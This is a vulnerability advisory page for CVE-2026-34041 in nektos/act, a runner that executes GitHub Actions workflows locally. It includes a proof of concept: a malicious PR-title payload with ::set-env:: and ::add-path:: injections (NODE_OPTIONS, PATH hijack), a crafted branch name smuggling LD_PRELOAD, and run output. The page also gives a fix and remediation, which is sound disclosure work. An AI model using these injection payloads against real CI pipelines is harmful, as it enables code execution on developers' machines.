Skip to main content

Docker CVE-2026-34041

HIGH
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)
2026-03-27 https://github.com/nektos/act GHSA-xmgr-9pqc-h5vw
7.7
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
SUSE
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
Analysis Generated
Mar 27, 2026 - 19:30 vuln.today
Patch released
Mar 27, 2026 - 19:30 nvd
Patch available
CVE Published
Mar 27, 2026 - 19:17 nvd
HIGH 7.7

DescriptionGitHub Advisory

Summary

act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which GitHub Actions disabled in October 2020 (CVE-2020-15228, GHSA-mfwh-5m23-j46w) due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This makes act strictly less secure than GitHub Actions for the same workflow file.

Vulnerable Code

pkg/runner/command.go, lines 52-58:

go
switch command {
case "set-env":
    rc.setEnv(ctx, kvPairs, arg)
case "set-output":
    rc.setOutput(ctx, kvPairs, arg)
case "add-path":
    rc.addPath(ctx, arg)

There is no check for the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable. The string ACTIONS_ALLOW_UNSECURE_COMMANDS does not appear anywhere in the act codebase.

On GitHub Actions, these commands are rejected unless ACTIONS_ALLOW_UNSECURE_COMMANDS=true is set:

Error: The `set-env` command is disabled. Please upgrade to using Environment Files
  or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true.

PoC: Environment and PATH Injection via PR Title

Tested on: act 0.2.84, Docker Desktop 29.1.2, macOS Darwin 24.5.0

Step 1 - Create a workflow that logs PR metadata:

.github/workflows/vuln.yml:

yaml
name: Vulnerable Workflow
on: [pull_request]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Log PR info
        run: |
          echo "Processing PR: ${{ github.event.pull_request.title }}"

      - name: Subsequent step - check environment
        run: |
          echo "=== Environment Injection Check ==="
          echo "NODE_OPTIONS=$NODE_OPTIONS"
          echo "EVIL_VAR=$EVIL_VAR"
          echo "PATH=$PATH"

Step 2 - Create a malicious event payload:

event.json:

json
{
  "pull_request": {
    "title": "Fix typo\n::set-env name=EVIL_VAR::INJECTED_BY_ATTACKER\n::set-env name=NODE_OPTIONS::--require=/tmp/evil.js\n::add-path::/tmp/evil-bin",
    "number": 1,
    "head": { "ref": "fix-typo", "sha": "abc123" },
    "base": { "ref": "main", "sha": "def456" }
  }
}

Step 3 - Run:

bash
git init && git add -A && git commit -m "init"
act pull_request -e event.json

Result:

[Vulnerable Workflow/build]   | Processing PR: Fix typo
[Vulnerable Workflow/build]   ⚙  ::set-env:: EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build]   ⚙  ::set-env:: NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build]   ⚙  ::add-path:: /tmp/evil-bin
[Vulnerable Workflow/build]   ✅  Success - Main Log PR info

[Vulnerable Workflow/build]   | === Environment Injection Check ===
[Vulnerable Workflow/build]   | NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build]   | EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build]   | PATH=/tmp/evil-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[Vulnerable Workflow/build]   | EXPLOITED: EVIL_VAR was injected into this step!
[Vulnerable Workflow/build]   ✅  Success
[Vulnerable Workflow/build] 🏁  Job succeeded

All three injections succeeded silently:

  • EVIL_VAR=INJECTED_BY_ATTACKER - arbitrary env var injected into subsequent step
  • NODE_OPTIONS=--require=/tmp/evil.js - Node.js code execution vector
  • /tmp/evil-bin prepended to PATH - command hijacking vector

Attack Scenarios

Scenario 1: Malicious PR title/body. An attacker opens a PR with ::set-env name=NODE_OPTIONS::--require=/tmp/evil.js embedded in the title. If any workflow step echoes the title (common for build summaries, Slack notifications, changelog generation), the injection fires. On GitHub Actions this is blocked. On act, it succeeds.

Scenario 2: Malicious branch name. ${{ github.head_ref }} is attacker-controlled. A branch named fix-typo%0A::set-env name=LD_PRELOAD::/tmp/evil.so can inject LD_PRELOAD, which causes every subsequent dynamically-linked binary to load the attacker's shared library.

Scenario 3: Commit message injection. If a step runs git log --oneline and the output flows to stdout, an attacker's commit message containing ::set-env:: commands will be processed.

Impact

  • Command injection via env vars: LD_PRELOAD, NODE_OPTIONS, PYTHONPATH, BASH_ENV, PERL5OPT all enable arbitrary code execution
  • PATH hijacking: attacker-controlled directory prepended to PATH hijacks any subsequent command
  • Cross-step escalation: a step that merely logs untrusted data compromises all subsequent steps
  • Supply chain risk: workflows that are safe on GitHub Actions become exploitable when run locally with act - developers have a false sense of security

Suggested Fix

Add a check matching GitHub Actions' behavior:

go
case "set-env":
    if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
        logger.Errorf("The `set-env` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
        return false
    }
    rc.setEnv(ctx, kvPairs, arg)
case "add-path":
    if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
        logger.Errorf("The `add-path` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
        return false
    }
    rc.addPath(ctx, arg)

This is a minimal, backwards-compatible fix - users who genuinely need these deprecated commands can opt in via ACTIONS_ALLOW_UNSECURE_COMMANDS=true, matching GitHub's approach.

---

Written by Golan Myers

AnalysisAI

Command injection in nektos/act (GitHub Actions local runner) allows attackers to execute arbitrary code by embedding deprecated workflow commands in untrusted input. Act versions prior to 0.2.86 unconditionally process ::set-env:: and ::add-path:: commands that GitHub Actions disabled in 2020, enabling PATH hijacking and environment variable injection when workflows echo PR titles, branch names, or commit messages. Publicly available exploit code exists with working proof-of-concept demonstrating NODE_OPTIONS and LD_PRELOAD injection vectors. This creates a critical supply chain risk where workflows safe on GitHub Actions become exploitable when developers test them locally with act.

Technical ContextAI

This vulnerability exploits act's command processing engine (pkg/runner/command.go) which parses GitHub Actions workflow commands from step output. When steps echo untrusted data to stdout, act scans for special command sequences like ::set-env name=VAR::value that modify the execution environment. GitHub Actions disabled these legacy commands in October 2020 (CVE-2020-15228) due to environment injection risks, requiring explicit opt-in via ACTIONS_ALLOW_UNSECURE_COMMANDS=true. Act's implementation lacks this guard check entirely, making it strictly less secure than the platform it emulates. The root cause is CWE-74 (Improper Neutralization of Special Elements in Output), where the command parser treats untrusted output as trusted control instructions. Affected product pkg:go/github.com_nektos_act processes workflow YAML files in Docker containers, with injected environment variables persisting across all subsequent job steps. Attack vectors include PR metadata (title, body), branch names (github.head_ref), and git commit messages - all commonly logged by CI workflows.

RemediationAI

Upgrade to act version 0.2.86 or later, released by the vendor with commit 0c739c8e39c41aa5a07665f732da9cab6df0097a implementing the security fix. The patch adds validation requiring ACTIONS_ALLOW_UNSECURE_COMMANDS=true environment variable before processing deprecated ::set-env:: and ::add-path:: commands, matching GitHub Actions' security model. Download the patched release from https://github.com/nektos/act/releases/tag/v0.2.86. Organizations unable to immediately upgrade should implement workflow hardening: avoid echoing untrusted input (PR titles, branch names, commit messages) directly to stdout, sanitize user-controlled strings before logging, and consider using GitHub-hosted runners for security-sensitive workflows instead of local act execution. Review existing workflows for patterns that echo github.event.pull_request.title, github.head_ref, or git log output. No effective workaround exists within vulnerable act versions as the command processing occurs unconditionally. The vendor advisory at https://github.com/nektos/act/security/advisories/GHSA-xmgr-9pqc-h5vw provides additional context and remediation guidance.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Vendor StatusVendor

SUSE

Severity: Critical
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-34041 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy